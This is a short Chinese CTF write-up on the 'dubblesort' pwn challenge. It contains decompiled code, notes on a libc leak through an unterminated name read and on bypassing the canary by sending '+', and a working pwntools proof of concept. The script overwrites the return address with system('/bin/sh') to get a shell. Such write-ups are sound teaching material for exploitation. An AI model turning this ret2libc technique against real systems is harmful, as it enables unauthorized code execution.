Analysis of TW.Du****sort
0x00 逆向分析
int __cdecl main(int argc, const char **argv, const char **envp)
{
int number; // eax
int *v4; // edi
unsigned int v5; // esi
unsigned int v6; // esi
int v7; // ST08_4
int result; // eax
unsigned int numbers; // [esp+18h] [ebp-74h]
int number_store; // [esp+1Ch] [ebp-70h]
char buf; // [esp+3Ch] [ebp-50h]
unsigned int v12; // [esp+7Ch] [ebp-10h]
v12 = __readgsdword(0x14u);
cha_start();
__printf_chk(1, (int)"What your name :");
read(0, &buf, 0x40u);
__printf_chk(1, (int)"Hello %s,How many numbers do you what to sort :");
__isoc99_scanf("%u", &numbers);
number = numbers;
if ( numbers )
{
v4 = &number_store;
v5 = 0;
do
{
__printf_chk(1, (int)"Enter the %d number : ");
fflush(stdout);
__isoc99_scanf("%u", v4);
++v5;
number = numbers;
++v4;
}
while ( numbers > v5 );
}
sort((unsigned int *)&number_store, number);
puts("Result :");
if ( numbers )
{
v6 = 0;
do
{
v7 = *(&number_store + v6);
__printf_chk(1, (int)"%u ");
++v6;
}
while ( numbers > v6 );
}
result = 0;
if ( __readgsdword(0x14u) != v12 )
sub_BA0();
return result;
}
需要关注的是main函数栈:
中间有4个pop憋忘了:
0x01 漏洞利用
- %s漏洞进行libc leak
- rewrite栈数据返回system
warmming!!!
- %u对于“+”不采取写入操作,因此可以绕过金丝雀
- 本机实验的libc和靶机有别,要用peda读取sys和sh的地址偏移
0x02 poc
from pwn import*
context.log_level = 'debug'
client=process("/home/pwn2plumer/Desktop/dubblesort")
#gdb.attach(client)
def send(context):
client.recvuntil("number :")
client.sendline(context)
def libc_leak():
client.recvuntil("What your name :")
client.sendline("aaaaaaaaaaaaaaaaaaaaaaaa")
client.recvuntil("Hello aaaaaaaaaaaaaaaaaaaaaaaa")
__libc=u32(client.recv(4))
print hex(__libc)
__libc_base=__libc-0xa-0x1b2000
return __libc_base
__libc_base=libc_leak()
client.sendline("35")
for i in range(8):
send("1")
for i in range(16):
send("2")
send("+")
system_addr=__libc_base+0x3ada0
string_addr=__libc_base+0x15ba10
for i in range(8):
send(str(system_addr))
send(str(string_addr))
send(str(string_addr))
pause()
client.interactive()
